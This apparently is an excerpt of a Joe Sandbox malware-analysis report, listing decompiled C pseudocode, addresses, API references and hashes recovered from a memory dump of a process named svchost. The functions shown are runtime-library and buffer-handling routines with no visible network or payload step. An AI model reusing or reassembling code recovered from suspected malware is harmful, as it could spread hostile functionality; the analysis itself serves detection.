                                                                                                                                                                                                                                                                            0x04014f3e
                                                                                                                                                                                                                                                                            0x04014f3e
                                                                                                                                                                                                                                                                            0x04014f4c
                                                                                                                                                                                                                                                                            0x04014f54
                                                                                                                                                                                                                                                                            0x04014f5a
                                                                                                                                                                                                                                                                            0x04014f61
                                                                                                                                                                                                                                                                            0x04014f72
                                                                                                                                                                                                                                                                            0x04014f63
                                                                                                                                                                                                                                                                            0x04014f6d
                                                                                                                                                                                                                                                                            0x04014f6d
                                                                                                                                                                                                                                                                            0x04014f7c
                                                                                                                                                                                                                                                                            0x04014f7c
                                                                                                                                                                                                                                                                            0x04014f83
                                                                                                                                                                                                                                                                            0x04014f8a
                                                                                                                                                                                                                                                                            0x04014f92
                                                                                                                                                                                                                                                                            0x04014f95
                                                                                                                                                                                                                                                                            0x04014f98
                                                                                                                                                                                                                                                                            0x04014f9f
                                                                                                                                                                                                                                                                            0x04014fb0
                                                                                                                                                                                                                                                                            0x04014fa1
                                                                                                                                                                                                                                                                            0x04014fa6
                                                                                                                                                                                                                                                                            0x04014fab
                                                                                                                                                                                                                                                                            0x04014fab
                                                                                                                                                                                                                                                                            0x04014fba
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04014fba
                                                                                                                                                                                                                                                                            0x04014fc4

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: codecvt
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3662085145-0
                                                                                                                                                                                                                                                                            • Opcode ID: 293eff8e08c402cabf5be0573675e725eacdbb13c63a1d46bf353841e3f01ce6
                                                                                                                                                                                                                                                                            • Instruction ID: 6fde489f6c5f844b1c7bf651d9850ea7eb6d4f342482ed0b4f1dd667ca52f8cd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 293eff8e08c402cabf5be0573675e725eacdbb13c63a1d46bf353841e3f01ce6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D416E74A00209DBDB04CF94D694BEEBBF2BB48308F248199D4057B3A1D776AE85DF90
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                                                                                                            			E0400CBC9(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                            				intOrPtr _t28;
                                                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t30 = __eflags;
                                                                                                                                                                                                                                                                            				_t26 = __edi;
                                                                                                                                                                                                                                                                            				_t25 = __edx;
                                                                                                                                                                                                                                                                            				_t22 = __ebx;
                                                                                                                                                                                                                                                                            				_push(0xc);
                                                                                                                                                                                                                                                                            				_push(0x427b08);
                                                                                                                                                                                                                                                                            				E04009CE8(__ebx, __edi, __esi);
                                                                                                                                                                                                                                                                            				_t28 = E04009556(__ebx, __edx, __edi, _t30);
                                                                                                                                                                                                                                                                            				if(( *(_t28 + 0x70) &  *0x429cb0) == 0) {
                                                                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                                                                            					E0400B404(_t22, 0xc);
                                                                                                                                                                                                                                                                            					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                                                                                                                                                                                                            					_t8 = _t28 + 0x6c; // 0x6c
                                                                                                                                                                                                                                                                            					_t26 =  *0x4294d8;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t29 - 0x1c)) = E0400CB8B(_t8,  *0x4294d8);
                                                                                                                                                                                                                                                                            					 *(_t29 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                                            					E0400CC33();
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t28 =  *((intOrPtr*)(E04009556(__ebx, __edx, __edi, _t32) + 0x6c));
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                                                                                                                            					E040099DE(_t25, _t26, 0x20);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return E04009D2D(_t28);
                                                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                                                            0x0400cbc9
                                                                                                                                                                                                                                                                            0x0400cbc9
                                                                                                                                                                                                                                                                            0x0400cbc9
                                                                                                                                                                                                                                                                            0x0400cbc9
                                                                                                                                                                                                                                                                            0x0400cbc9
                                                                                                                                                                                                                                                                            0x0400cbcb
                                                                                                                                                                                                                                                                            0x0400cbd0
                                                                                                                                                                                                                                                                            0x0400cbda
                                                                                                                                                                                                                                                                            0x0400cbe4
                                                                                                                                                                                                                                                                            0x0400cc08
                                                                                                                                                                                                                                                                            0x0400cc0a
                                                                                                                                                                                                                                                                            0x0400cc10
                                                                                                                                                                                                                                                                            0x0400cc14
                                                                                                                                                                                                                                                                            0x0400cc17
                                                                                                                                                                                                                                                                            0x0400cc22
                                                                                                                                                                                                                                                                            0x0400cc25
                                                                                                                                                                                                                                                                            0x0400cc2c
                                                                                                                                                                                                                                                                            0x0400cbe6
                                                                                                                                                                                                                                                                            0x0400cbe6
                                                                                                                                                                                                                                                                            0x0400cbea
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0400cbec
                                                                                                                                                                                                                                                                            0x0400cbf1
                                                                                                                                                                                                                                                                            0x0400cbf1
                                                                                                                                                                                                                                                                            0x0400cbea
                                                                                                                                                                                                                                                                            0x0400cbf6
                                                                                                                                                                                                                                                                            0x0400cbfa
                                                                                                                                                                                                                                                                            0x0400cbff
                                                                                                                                                                                                                                                                            0x0400cc07

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 0400CBD5
                                                                                                                                                                                                                                                                              • Part of subcall function 04009556: __getptd_noexit.LIBCMT ref: 04009559
                                                                                                                                                                                                                                                                              • Part of subcall function 04009556: __amsg_exit.LIBCMT ref: 04009566
                                                                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 0400CBEC
                                                                                                                                                                                                                                                                            • __amsg_exit.LIBCMT ref: 0400CBFA
                                                                                                                                                                                                                                                                            • __lock.LIBCMT ref: 0400CC0A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3521780317-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1f0354d96fabdbc1a2ba5b958ed8245a13b2cce1e2fe9863332c0abb1a1d4ff1
                                                                                                                                                                                                                                                                            • Instruction ID: 775b438eefefd3dc35736b17a6f12e75e8ac1b8e9e2c3c2db30c63f4ae9875e3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f0354d96fabdbc1a2ba5b958ed8245a13b2cce1e2fe9863332c0abb1a1d4ff1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3EF06D71A19704CBF724BBA98801B8933E06B0072CF55C219C041BB2D1CB34B902CB55
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 40%
                                                                                                                                                                                                                                                                            			E0401F9F0(void* __ebx, intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                                            				void _v84;
                                                                                                                                                                                                                                                                            				intOrPtr _v88;
                                                                                                                                                                                                                                                                            				signed short _v90;
                                                                                                                                                                                                                                                                            				signed short _v92;
                                                                                                                                                                                                                                                                            				signed short _v94;
                                                                                                                                                                                                                                                                            				signed short _v96;
                                                                                                                                                                                                                                                                            				signed short _v98;
                                                                                                                                                                                                                                                                            				signed short _v102;
                                                                                                                                                                                                                                                                            				signed short _v104;
                                                                                                                                                                                                                                                                            				intOrPtr _v108;
                                                                                                                                                                                                                                                                            				intOrPtr _v112;
                                                                                                                                                                                                                                                                            				intOrPtr _v116;
                                                                                                                                                                                                                                                                            				intOrPtr _v120;
                                                                                                                                                                                                                                                                            				intOrPtr _v124;
                                                                                                                                                                                                                                                                            				intOrPtr _v128;
                                                                                                                                                                                                                                                                            				intOrPtr _v132;
                                                                                                                                                                                                                                                                            				intOrPtr _v136;
                                                                                                                                                                                                                                                                            				intOrPtr* _v140;
                                                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                                            				void* _t149;
                                                                                                                                                                                                                                                                            				void* _t180;
                                                                                                                                                                                                                                                                            				signed int _t209;
                                                                                                                                                                                                                                                                            				void* _t210;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t180 = __edx;
                                                                                                                                                                                                                                                                            				_t149 = __ebx;
                                                                                                                                                                                                                                                                            				_v28 =  *0x429024 ^ _t209;
                                                                                                                                                                                                                                                                            				_v140 = __ecx;
                                                                                                                                                                                                                                                                            				_v5 = 0;
                                                                                                                                                                                                                                                                            				while(_a4 != 0 && _a8 >= 1) {
                                                                                                                                                                                                                                                                            					_v16 = _a4;
                                                                                                                                                                                                                                                                            					_v12 = _a8;
                                                                                                                                                                                                                                                                            					if(_a12 != 0) {
                                                                                                                                                                                                                                                                            						memcpy( &_v84, 0x427564, 0xd << 2);
                                                                                                                                                                                                                                                                            						asm("movsw");
                                                                                                                                                                                                                                                                            						asm("movsb");
                                                                                                                                                                                                                                                                            						_v20 = 0x200;
                                                                                                                                                                                                                                                                            						_v112 = E04020CE0(_v20 + 1);
                                                                                                                                                                                                                                                                            						_v24 = _v112;
                                                                                                                                                                                                                                                                            						E04007010(0x42757e, _v24, 0, _v20 + 1);
                                                                                                                                                                                                                                                                            						 *0x4250e8( &_v104);
                                                                                                                                                                                                                                                                            						 *0x4251f8(_v24, _v20 + 1,  &_v84, _v104 & 0x0000ffff, _v102 & 0x0000ffff, _v98 & 0x0000ffff, _v96 & 0x0000ffff, _v94 & 0x0000ffff, _v92 & 0x0000ffff, _v90 & 0x0000ffff, _a12);
                                                                                                                                                                                                                                                                            						_v88 = E040070A0(_v24);
                                                                                                                                                                                                                                                                            						_v116 = E04020CE0(_a8 + _v88);
                                                                                                                                                                                                                                                                            						_v16 = _v116;
                                                                                                                                                                                                                                                                            						_push(_v88);
                                                                                                                                                                                                                                                                            						E04006CA0(_t149, 0x42757e, 0x427564, _v16, _v24);
                                                                                                                                                                                                                                                                            						_push(_a8);
                                                                                                                                                                                                                                                                            						E04006CA0(_t149, 0x42757e, 0x427564, _v16 + _v88, _a4);
                                                                                                                                                                                                                                                                            						_t210 = _t210 + 0x68;
                                                                                                                                                                                                                                                                            						_v12 = _a8 + _v88;
                                                                                                                                                                                                                                                                            						if(_v24 != 0) {
                                                                                                                                                                                                                                                                            							_v120 = _v24;
                                                                                                                                                                                                                                                                            							E04020CC0(_v120);
                                                                                                                                                                                                                                                                            							_t210 = _t210 + 4;
                                                                                                                                                                                                                                                                            							_v24 = 0x666;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if( *_v140 != 0) {
                                                                                                                                                                                                                                                                            						_v128 = E04020CE0( *((intOrPtr*)(_v140 + 4)) + _v12);
                                                                                                                                                                                                                                                                            						_v108 = _v128;
                                                                                                                                                                                                                                                                            						_push( *((intOrPtr*)(_v140 + 4)));
                                                                                                                                                                                                                                                                            						E04006CA0(_t149, 0x42757e, 0x427564, _v108,  *_v140);
                                                                                                                                                                                                                                                                            						_push(_v12);
                                                                                                                                                                                                                                                                            						E04006CA0(_t149, 0x42757e, 0x427564, _v108 +  *((intOrPtr*)(_v140 + 4)), _v16);
                                                                                                                                                                                                                                                                            						_t210 = _t210 + 0x1c;
                                                                                                                                                                                                                                                                            						if( *_v140 != 0) {
                                                                                                                                                                                                                                                                            							_v132 =  *_v140;
                                                                                                                                                                                                                                                                            							E04020CC0(_v132);
                                                                                                                                                                                                                                                                            							_t210 = _t210 + 4;
                                                                                                                                                                                                                                                                            							 *_v140 = 0x666;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						 *_v140 = _v108;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_v140 + 4)) =  *((intOrPtr*)(_v140 + 4)) + _v12;
                                                                                                                                                                                                                                                                            						_v5 = 1;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_v124 = E04020CE0(_v12);
                                                                                                                                                                                                                                                                            						 *_v140 = _v124;
                                                                                                                                                                                                                                                                            						_push(_v12);
                                                                                                                                                                                                                                                                            						E04006CA0(_t149, 0x42757e, 0x427564,  *_v140, _v16);
                                                                                                                                                                                                                                                                            						_t210 = _t210 + 0x10;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_v140 + 4)) = _v12;
                                                                                                                                                                                                                                                                            						_v5 = 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v16 != _a4 && _v16 != 0) {
                                                                                                                                                                                                                                                                            						_v136 = _v16;
                                                                                                                                                                                                                                                                            						E04020CC0(_v136);
                                                                                                                                                                                                                                                                            						_t210 = _t210 + 4;
                                                                                                                                                                                                                                                                            						_v16 = 0x666;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t180 = 0;
                                                                                                                                                                                                                                                                            					if(0 != 0) {
                                                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                                                            						return E04006C8C(_v5, _t149, _v28 ^ _t209, _t180, 0x42757e, 0x427564);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				goto L16;
                                                                                                                                                                                                                                                                            			}

































                                                                                                                                                                                                                                                                            0x0401f9f0
                                                                                                                                                                                                                                                                            0x0401f9f0
                                                                                                                                                                                                                                                                            0x0401fa00
                                                                                                                                                                                                                                                                            0x0401fa05
                                                                                                                                                                                                                                                                            0x0401fa0b
                                                                                                                                                                                                                                                                            0x0401fa0f
                                                                                                                                                                                                                                                                            0x0401fa23
                                                                                                                                                                                                                                                                            0x0401fa29
                                                                                                                                                                                                                                                                            0x0401fa30
                                                                                                                                                                                                                                                                            0x0401fa43
                                                                                                                                                                                                                                                                            0x0401fa45
                                                                                                                                                                                                                                                                            0x0401fa47
                                                                                                                                                                                                                                                                            0x0401fa48
                                                                                                                                                                                                                                                                            0x0401fa5e
                                                                                                                                                                                                                                                                            0x0401fa64
                                                                                                                                                                                                                                                                            0x0401fa74
                                                                                                                                                                                                                                                                            0x0401fa80
                                                                                                                                                                                                                                                                            0x0401fabc
                                                                                                                                                                                                                                                                            0x0401fad1
                                                                                                                                                                                                                                                                            0x0401fae3
                                                                                                                                                                                                                                                                            0x0401fae9
                                                                                                                                                                                                                                                                            0x0401faef
                                                                                                                                                                                                                                                                            0x0401faf8
                                                                                                                                                                                                                                                                            0x0401fb03
                                                                                                                                                                                                                                                                            0x0401fb0f
                                                                                                                                                                                                                                                                            0x0401fb14
                                                                                                                                                                                                                                                                            0x0401fb1d
                                                                                                                                                                                                                                                                            0x0401fb24
                                                                                                                                                                                                                                                                            0x0401fb29
                                                                                                                                                                                                                                                                            0x0401fb30
                                                                                                                                                                                                                                                                            0x0401fb35
                                                                                                                                                                                                                                                                            0x0401fb38
                                                                                                                                                                                                                                                                            0x0401fb38
                                                                                                                                                                                                                                                                            0x0401fb24
                                                                                                                                                                                                                                                                            0x0401fb48
                                                                                                                                                                                                                                                                            0x0401fba7
                                                                                                                                                                                                                                                                            0x0401fbad
                                                                                                                                                                                                                                                                            0x0401fbb9
                                                                                                                                                                                                                                                                            0x0401fbc7
                                                                                                                                                                                                                                                                            0x0401fbd2
                                                                                                                                                                                                                                                                            0x0401fbe4
                                                                                                                                                                                                                                                                            0x0401fbe9
                                                                                                                                                                                                                                                                            0x0401fbf5
                                                                                                                                                                                                                                                                            0x0401fbff
                                                                                                                                                                                                                                                                            0x0401fc06
                                                                                                                                                                                                                                                                            0x0401fc0b
                                                                                                                                                                                                                                                                            0x0401fc14
                                                                                                                                                                                                                                                                            0x0401fc14
                                                                                                                                                                                                                                                                            0x0401fc23
                                                                                                                                                                                                                                                                            0x0401fc37
                                                                                                                                                                                                                                                                            0x0401fc3a
                                                                                                                                                                                                                                                                            0x0401fb4a
                                                                                                                                                                                                                                                                            0x0401fb56
                                                                                                                                                                                                                                                                            0x0401fb62
                                                                                                                                                                                                                                                                            0x0401fb67
                                                                                                                                                                                                                                                                            0x0401fb75
                                                                                                                                                                                                                                                                            0x0401fb7a
                                                                                                                                                                                                                                                                            0x0401fb86
                                                                                                                                                                                                                                                                            0x0401fb89
                                                                                                                                                                                                                                                                            0x0401fb89
                                                                                                                                                                                                                                                                            0x0401fc44
                                                                                                                                                                                                                                                                            0x0401fc4f
                                                                                                                                                                                                                                                                            0x0401fc5c
                                                                                                                                                                                                                                                                            0x0401fc61
                                                                                                                                                                                                                                                                            0x0401fc64
                                                                                                                                                                                                                                                                            0x0401fc64
                                                                                                                                                                                                                                                                            0x0401fc6b
                                                                                                                                                                                                                                                                            0x0401fc6d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0401fc73
                                                                                                                                                                                                                                                                            0x0401fc73
                                                                                                                                                                                                                                                                            0x0401fc85
                                                                                                                                                                                                                                                                            0x0401fc85
                                                                                                                                                                                                                                                                            0x0401fc6d
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memset_strlen
                                                                                                                                                                                                                                                                            • String ID: duB
                                                                                                                                                                                                                                                                            • API String ID: 2279092321-2047154145
                                                                                                                                                                                                                                                                            • Opcode ID: 8ef916ac99e2acd8d5d850c8b0a63cac94112d2d259028affcb04b3b3e16ebb3
                                                                                                                                                                                                                                                                            • Instruction ID: c505e5f8326b13ea594a17ca5410903a82e5ac8279d4bf993f0f99441c28ac3a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ef916ac99e2acd8d5d850c8b0a63cac94112d2d259028affcb04b3b3e16ebb3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F913BB5D00218AFDB54CFD8D880BAEB7B5BF48318F14C159E909A7341EB35AA85CF51
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                                                                                                                            			E0401C2A0(void* __edi, signed int _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				intOrPtr* _v16;
                                                                                                                                                                                                                                                                            				signed char _v20;
                                                                                                                                                                                                                                                                            				signed char _v21;
                                                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                                                            				signed int* _v40;
                                                                                                                                                                                                                                                                            				intOrPtr* _v44;
                                                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                                                            				intOrPtr _t103;
                                                                                                                                                                                                                                                                            				intOrPtr _t109;
                                                                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                                                                            				void* _t177;
                                                                                                                                                                                                                                                                            				void* _t178;
                                                                                                                                                                                                                                                                            				void* _t181;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t177 = __edi;
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				while((_a4 & 0x0000ffff) == 1 || (_a4 & 0x0000ffff) == 2 || (_a4 & 0x0000ffff) == 3 || (_a4 & 0x0000ffff) == 4) {
                                                                                                                                                                                                                                                                            					if(_a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_v12 =  *0x4250e4(_a8);
                                                                                                                                                                                                                                                                            						if(_v12 < 1 || _v12 > 0x64) {
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_v20 = 1;
                                                                                                                                                                                                                                                                            							if((_a4 & 0x0000ffff) == 4) {
                                                                                                                                                                                                                                                                            								L16:
                                                                                                                                                                                                                                                                            								_v21 = 0;
                                                                                                                                                                                                                                                                            								_v44 = E04020CE0(0xa);
                                                                                                                                                                                                                                                                            								_v16 = _v44;
                                                                                                                                                                                                                                                                            								E04007010(_t177, _v16, 0, 0xa);
                                                                                                                                                                                                                                                                            								 *((short*)(_v16 + 8)) = _a4;
                                                                                                                                                                                                                                                                            								_t103 = E04020CE0(_v12 + 1);
                                                                                                                                                                                                                                                                            								_t181 = _t178 + 0x14;
                                                                                                                                                                                                                                                                            								_v48 = _t103;
                                                                                                                                                                                                                                                                            								 *_v16 = _v48;
                                                                                                                                                                                                                                                                            								E04005A10(_v16,  *_v16, _v12 + 1, _a8);
                                                                                                                                                                                                                                                                            								if((_a4 & 0x0000ffff) != 4) {
                                                                                                                                                                                                                                                                            									_t109 = E04020CE0(_v20 + 1);
                                                                                                                                                                                                                                                                            									_t181 = _t181 + 4;
                                                                                                                                                                                                                                                                            									_v52 = _t109;
                                                                                                                                                                                                                                                                            									 *((intOrPtr*)(_v16 + 4)) = _v52;
                                                                                                                                                                                                                                                                            									E04005A10( *((intOrPtr*)(_v16 + 4)),  *((intOrPtr*)(_v16 + 4)), _v20 + 1, _a12);
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									 *((intOrPtr*)(_v16 + 4)) =  *_a12;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v28 = E0401E4B0();
                                                                                                                                                                                                                                                                            								while(1) {
                                                                                                                                                                                                                                                                            									_t115 = E0401E4A0(_v28);
                                                                                                                                                                                                                                                                            									_t178 = _t181 + 4;
                                                                                                                                                                                                                                                                            									if(_t115 == 0) {
                                                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_v40 = 0xfa6d3c;
                                                                                                                                                                                                                                                                            									_v36 = 0x2710;
                                                                                                                                                                                                                                                                            									_v32 = 0xf9d0e8;
                                                                                                                                                                                                                                                                            									if((_a4 & 0x0000ffff) != 2) {
                                                                                                                                                                                                                                                                            										if((_a4 & 0x0000ffff) != 3) {
                                                                                                                                                                                                                                                                            											if((_a4 & 0x0000ffff) == 4) {
                                                                                                                                                                                                                                                                            												_v40 = 0xfa6d44;
                                                                                                                                                                                                                                                                            												_v36 = 0xf4240;
                                                                                                                                                                                                                                                                            												_v32 = 0x7fbee8;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            											_v40 = 0xfa6d48;
                                                                                                                                                                                                                                                                            											_v36 = 0xf4240;
                                                                                                                                                                                                                                                                            											_v32 = 0xbcc7e8;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										_v40 = 0xfa6d40;
                                                                                                                                                                                                                                                                            										_v36 = 0xf4240;
                                                                                                                                                                                                                                                                            										_v32 = 0x42b5e8;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									if( *_v40 < _v36) {
                                                                                                                                                                                                                                                                            										 *((intOrPtr*)(_v32 +  *_v40 * 4)) = _v16;
                                                                                                                                                                                                                                                                            										_v8 =  *_v40;
                                                                                                                                                                                                                                                                            										 *_v40 =  *_v40 + 1;
                                                                                                                                                                                                                                                                            										_v21 = 1;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									E0401E480( &_v28);
                                                                                                                                                                                                                                                                            									_t181 = _t178 + 4;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								if((_v21 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            									if( *_v16 != 0) {
                                                                                                                                                                                                                                                                            										_v56 =  *_v16;
                                                                                                                                                                                                                                                                            										E04020CC0(_v56);
                                                                                                                                                                                                                                                                            										_t178 = _t178 + 4;
                                                                                                                                                                                                                                                                            										 *_v16 = 0x666;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									if((_a4 & 0x0000ffff) != 4 &&  *((intOrPtr*)(_v16 + 4)) != 0) {
                                                                                                                                                                                                                                                                            										_v60 =  *((intOrPtr*)(_v16 + 4));
                                                                                                                                                                                                                                                                            										E04020CC0(_v60);
                                                                                                                                                                                                                                                                            										_t178 = _t178 + 4;
                                                                                                                                                                                                                                                                            										 *((intOrPtr*)(_v16 + 4)) = 0x666;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									if(_v16 != 0) {
                                                                                                                                                                                                                                                                            										_v64 = _v16;
                                                                                                                                                                                                                                                                            										E04020CC0(_v64);
                                                                                                                                                                                                                                                                            										_t178 = _t178 + 4;
                                                                                                                                                                                                                                                                            										_v16 = 0x666;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								if(0 != 0) {
                                                                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v20 =  *0x4250e4(_a12);
                                                                                                                                                                                                                                                                            							if(_v20 < 1 || _v20 > 0x64) {
                                                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								goto L16;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                                                                            0x0401c2a0
                                                                                                                                                                                                                                                                            0x0401c2a6
                                                                                                                                                                                                                                                                            0x0401c2ad
                                                                                                                                                                                                                                                                            0x0401c2da
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0401c2e7
                                                                                                                                                                                                                                                                            0x0401c2f1
                                                                                                                                                                                                                                                                            0x0401c2f8
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0401c305
                                                                                                                                                                                                                                                                            0x0401c305
                                                                                                                                                                                                                                                                            0x0401c313
                                                                                                                                                                                                                                                                            0x0401c333
                                                                                                                                                                                                                                                                            0x0401c333
                                                                                                                                                                                                                                                                            0x0401c341
                                                                                                                                                                                                                                                                            0x0401c347
                                                                                                                                                                                                                                                                            0x0401c352
                                                                                                                                                                                                                                                                            0x0401c361
